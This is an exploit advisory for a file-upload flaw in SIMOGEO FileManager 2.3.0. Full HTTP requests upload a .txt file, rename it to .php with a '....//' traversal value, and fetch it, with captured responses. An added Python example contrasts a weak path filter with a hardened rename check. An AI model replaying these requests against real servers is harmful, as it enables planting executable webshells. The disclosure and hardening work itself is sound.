SIMOGEO FileManager 2.3.0 File Upload

2016-02-12T00:00:00
ID PACKETSTORM:135743
Type packetstorm
Reporter HaHwul
Modified 2016-02-12T00:00:00

Description

# Exploit Title: SIMOGEO FileManager 2.3.0 - File Upload Vulnerability  
# Date: 2015-12-09  
# Exploit Author: HaHwul  
# Exploit Author Blog: http://www.codeblack.net  
# Vendor Homepage: https://github.com/simogeo/Filemanager  
# Software Link: git clone http://github.com/simogeo/Filemanager.git  
# Version: 2.3.0  
# Tested on: Debian [Wheezy]  
# CVE : none  
  
1. Upload a file with an extension the upload step accepts (here .txt)  
  
POST /vul_test/target/Filemanager/connectors/php/filemanager.php?config=filemanager.config.js HTTP/1.1  
Host: 192.168.0.15  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0  
Accept: application/json  
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Cache-Control: no-cache  
X-Requested-With: XMLHttpRequest  
Referer: http://192.168.0.15/vul_test/target/Filemanager/  
Content-Length: 520  
Content-Type: multipart/form-data; boundary=---------------------------1675330531498115896355630737  
Connection: keep-alive  
Pragma: no-cache  
  
-----------------------------1675330531498115896355630737  
Content-Disposition: form-data; name="mode"  
  
add  
-----------------------------1675330531498115896355630737  
Content-Disposition: form-data; name="currentpath"  
  
/vul_test/target/Filemanager/userfiles/  
-----------------------------1675330531498115896355630737  
Content-Disposition: form-data; name="newfile"; filename="shell.txt"  
Content-Type: text/plain  
  
echo "Write PHP WebShell Code";  
<html><body><script>alert("45")</script></body></html>  
  
-----------------------------1675330531498115896355630737--  
  
  
2. Rename the file: change the extension (.txt -> .php or .html) and tamper with the path (/userfiles -> /)  
  
The `new` parameter is `....//shell.php`. The doubled dots and slashes are the usual way to get a `../` past a filter that strips that sequence only once, and the rename handler accepts the `.php` extension that the upload step would not, which is why the file is uploaded as `.txt` first and renamed afterwards.  
  
GET /vul_test/target/Filemanager/connectors/php/filemanager.php?mode=rename&old=%2Fvul_test%2Ftarget%2FFilemanager%2Fuserfiles%2Fshell.txt&new=....//shell.php&config=filemanager.config.js HTTP/1.1  
Host: 192.168.0.15  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Referer: http://192.168.0.15/vul_test/target/Filemanager/  
Connection: keep-alive  
  
  
3. Request the renamed file  
  
http://192.168.0.15/vul_test/target/Filemanager/userfiles/shell.php  
  
Response (the X-Powered-By header and the text/html content type show the renamed file is now handled by the PHP interpreter rather than served as a static .txt; the PoC body has no `<?php` open tag, so it is echoed back verbatim, and because it is returned as HTML the inline script runs in the browser. Note that this request fetches shell.php from userfiles/, so the capture confirms the extension change; the directory change from the rename step is not confirmed by it.)  
HTTP/1.1 200 OK  
Date: Tue, 08 Dec 2015 17:25:20 GMT  
Server: Apache/2.2.16 (Debian)  
X-Powered-By: PHP/5.3.3-7+squeeze19  
Vary: Accept-Encoding  
Content-Length: 32  
Keep-Alive: timeout=15, max=100  
Connection: Keep-Alive  
Content-Type: text/html  
  
echo "Write PHP WebShell Code";  
<html><body><script>alert("45")</script></body></html>  
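
Added example (my own Python, not code from the advisory or from the simogeo/Filemanager project). It models the rename step above: the filter the connector applied is not shown on the page, so a single-pass removal of `../` is assumed here as the kind of check the `....//shell.php` value is designed to slip past; beside it is a hardened rename check that treats the new name as a bare file name, applies an extension allowlist (an assumed list, chosen so that .txt passes and .php does not, matching the upload-then-rename order of the write-up) and confines the result to the upload root. The last function is the check a tester would use instead of the echo payload: a `<?php echo 1234*5678; ?>` marker whose product only appears in the response if PHP actually ran the file.

```python
#!/usr/bin/env python3
"""Added example; not code from the advisory or from simogeo/Filemanager.

weak_rename_target()     - where the file lands if the connector strips '../'
                           once (assumed filter) and lets the OS resolve '..'.
hardened_rename_target() - the check a rename handler should apply instead.
classify_response()      - tells "PHP ran my payload" apart from "PHP served
                           the file but the payload was not PHP".
"""
import posixpath

# Values taken from the advisory's requests.
UPLOAD_ROOT = "/vul_test/target/Filemanager/userfiles/"
OLD_PATH = UPLOAD_ROOT + "shell.txt"
NEW_NAME = "....//shell.php"

# Assumed allowlist: the upload step accepted shell.txt, so .txt is in it
# and .php is not. The real config is not shown on the page.
ALLOWED_EXT = frozenset({"txt", "jpg", "jpeg", "png", "gif", "pdf"})


def naive_strip(name: str) -> str:
    """Single-pass removal of '../' (assumed weak filter).
    '....//shell.php' loses one '../' and becomes '../shell.php'."""
    return name.replace("../", "")


def weak_rename_target(old_path: str, new_name: str) -> str:
    """Join dirname(old) with the naively filtered name and normalise,
    which is what the filesystem does when the connector calls rename()."""
    joined = posixpath.join(posixpath.dirname(old_path), naive_strip(new_name))
    return posixpath.normpath(joined)


def _extension(name: str) -> str:
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def hardened_rename_target(old_path: str, new_name: str) -> str:
    """A rename changes a basename only: reject separators and traversal
    outright, re-apply the upload allowlist, and confine both the source
    and the resulting path to UPLOAD_ROOT after normalisation."""
    if not new_name or "\x00" in new_name:
        raise ValueError("empty or NUL-containing name")
    if new_name != posixpath.basename(new_name) or new_name in (".", ".."):
        raise ValueError("new name must be a bare file name, not a path")
    if _extension(new_name) not in ALLOWED_EXT:
        raise ValueError(f"extension {_extension(new_name)!r} not in allowlist")
    old_norm = posixpath.normpath(old_path)
    if not old_norm.startswith(UPLOAD_ROOT):
        raise ValueError("source path escapes the upload root")
    target = posixpath.normpath(posixpath.join(posixpath.dirname(old_norm), new_name))
    if not target.startswith(UPLOAD_ROOT):
        raise ValueError("target path escapes the upload root")
    return target


# The advisory's payload has no '<?php' tag, so the 200 response echoes it
# verbatim even though X-Powered-By shows PHP handled the request. A marker
# whose value only exists after evaluation removes that ambiguity.
MARKER_VALUE = str(1234 * 5678)            # assumed marker, 7006652
EXECUTION_PAYLOAD = "<?php echo 1234*5678; ?>"


def classify_response(headers: dict, body: str) -> str:
    """'executed'    : the marker product is in the body and the tag is gone.
       'interpreted' : PHP served the file but nothing in it was executed.
       'static'      : the web server returned it as a plain file."""
    if MARKER_VALUE in body and "<?php" not in body:
        return "executed"
    lowered = {k.lower(): v for k, v in headers.items()}
    if lowered.get("x-powered-by", "").startswith("PHP"):
        return "interpreted"
    return "static"


if __name__ == "__main__":
    print("weak filter  :", weak_rename_target(OLD_PATH, NEW_NAME))
    for candidate in (NEW_NAME, "shell.php", "notes.txt"):
        try:
            print("hardened     :", candidate, "->", hardened_rename_target(OLD_PATH, candidate))
        except ValueError as exc:
            print("hardened     :", candidate, "-> rejected:", exc)
    # Headers and body constructed from the advisory's captured response.
    captured = {"X-Powered-By": "PHP/5.3.3-7+squeeze19", "Content-Type": "text/html"}
    print("advisory body:", classify_response(captured, 'echo "Write PHP WebShell Code";'))
```

Running it shows the assumed single-pass filter turning `....//shell.php` into `../shell.php`, which lands the file one directory above userfiles/ with a `.php` extension, while the hardened check rejects both the traversal and the bare `shell.php` rename and only passes a name that is a plain basename with an allowed extension.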
  
  
  